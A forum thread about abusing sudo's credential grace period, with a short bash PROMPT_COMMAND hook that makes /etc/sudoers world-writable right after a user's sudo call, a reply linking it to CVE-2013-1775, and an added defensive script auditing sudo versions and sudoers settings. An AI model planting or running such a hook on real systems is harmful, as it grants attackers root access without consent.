Aerosol

Exploiting sudo's grace period


Posted (edited)

What is sudo's grace period?

When a user first calls sudo to launch some commands as root, he will be asked for his own password. But if the user calls sudo again in the following 5 minutes, he won't be asked for the same password. That's because the password is cached in memory for a period of time called the « grace period ».

This grace period mechanism is activated by default on every system I know where sudo can be found (Linux distros, OSX, BSDs…).

Here is the exploit code (sudo_grace_period_exploit.sh):

function bash_history {
    if [ $? -ne 1 ] # previous command was successful
    then
        if [ -z "${PWNED+xxx}" ] # this test is used to check if the system was already pwned
        then
            history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo '
            if [ $? -eq 0 ] # previous command is a sudo one
            then
                sudo chmod 777 /etc/sudoers 2> /dev/null
                PWNED="yes"
                unset PROMPT_COMMAND 2> /dev/null
            fi
        fi
    fi
}
PROMPT_COMMAND=bash_history

For more: http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf

In my opinion this is a very interesting piece of work. :)

Give it 5 minutes of your time, it's worth it!

Edited by Aerosol
Posted

This is CVE-2013-1775, it is just explained rather poorly in that PDF. The vulnerability dates from 2013.

I add the user marian to sudoers and check that it is OK:


root@hp:~# echo "marian ALL=(ALL:ALL) ALL" >> /etc/sudoers
root@hp:~# grep marian /etc/sudoers
marian ALL=(ALL:ALL) ALL

I try in one terminal:


marian@hp:~$ sudo su -
[sudo] password for marian:
root@hp:~#

A few seconds later I try in a second terminal. It seems it asks for the password again.


marian@hp:~$ sudo su -
[sudo] password for marian:

It works on versions 1.6.0 - 1.7.10

More details here:

- Authentication bypass when clock is reset

- CVE - CVE-2013-1775
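A defender-side companion to the two posts, added here as an example and not code from the thread or from the sudo project: it compares a sudo version string against the 1.6.0 - 1.7.10 range the reply names, and audits a sudoers text read from stdin for the two standard Defaults options that shrink the grace period, timestamp_timeout and tty_tickets. The sample sudoers fragments are constructed and the function names are this example's own.

```sh
#!/bin/sh
# Added example, not from the thread or the sudo project: defender-side checks
# for the cached-credential reuse the posts above describe.

# Turn "MAJOR.MINOR.PATCH[pN]" into one comparable integer, e.g. 1.7.10 -> 10710.
# A trailing patch level such as "p7" is ignored: only the base version is compared.
sudo_version_number() {
    case "$1" in [0-9]*.[0-9]*.[0-9]*) ;; *) echo 0; return 1 ;; esac
    set -- $(printf '%s' "$1" | sed 's/^\([0-9]*\)\.\([0-9]*\)\.\([0-9]*\).*/\1 \2 \3/')
    echo $(( $1 * 10000 + $2 * 100 + $3 ))
}

# Returns 0 when the base version lies in the range named in the reply above (1.6.0 - 1.7.10).
sudo_version_affected() {
    n=$(sudo_version_number "$1") || return 1
    [ "$n" -ge 10600 ] && [ "$n" -le 10710 ]
}

# Reads sudoers text on stdin and reports on the two Defaults that shrink the grace
# period: timestamp_timeout=0 (ask for the password every time) and tty_tickets (a
# cached credential only counts in the terminal that entered it). Comment lines are
# dropped and only plain "Defaults" lines are inspected. Returns 0 when both are set.
audit_sudoers_grace_period() {
    text=$(grep -v '^[[:space:]]*#' || true)
    ok=0
    if printf '%s\n' "$text" | grep -q -E \
        '^[[:space:]]*Defaults.*timestamp_timeout[[:space:]]*=[[:space:]]*0([^0-9]|$)'; then
        echo "ok:   timestamp_timeout=0, no grace period"
    else
        echo "weak: timestamp_timeout is not 0, cached credentials are reused"; ok=1
    fi
    if printf '%s\n' "$text" | grep -q -E \
        '^[[:space:]]*Defaults[[:space:],]+([^#]*,[[:space:]]*)?tty_tickets([[:space:],]|$)'; then
        echo "ok:   tty_tickets set, a credential is bound to one terminal"
    else
        echo "weak: tty_tickets not set or negated, one terminal's credential serves all"; ok=1
    fi
    return $ok
}

# Constructed sample sudoers fragments, not taken from any real host.
WEAK_SUDOERS='Defaults env_reset,!tty_tickets
# Defaults timestamp_timeout=0   (commented out, so not in effect)
marian ALL=(ALL:ALL) ALL'
HARDENED_SUDOERS='Defaults env_reset, timestamp_timeout=0, tty_tickets
marian ALL=(ALL:ALL) ALL'

printf '%s\n' "$WEAK_SUDOERS" | audit_sudoers_grace_period || true
printf '%s\n' "$HARDENED_SUDOERS" | audit_sudoers_grace_period
```

On a live host the same audit can be fed with `sudo -l` output only by a user who already has sudo rights, so the sudoers text is normally collected by root and piped in.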
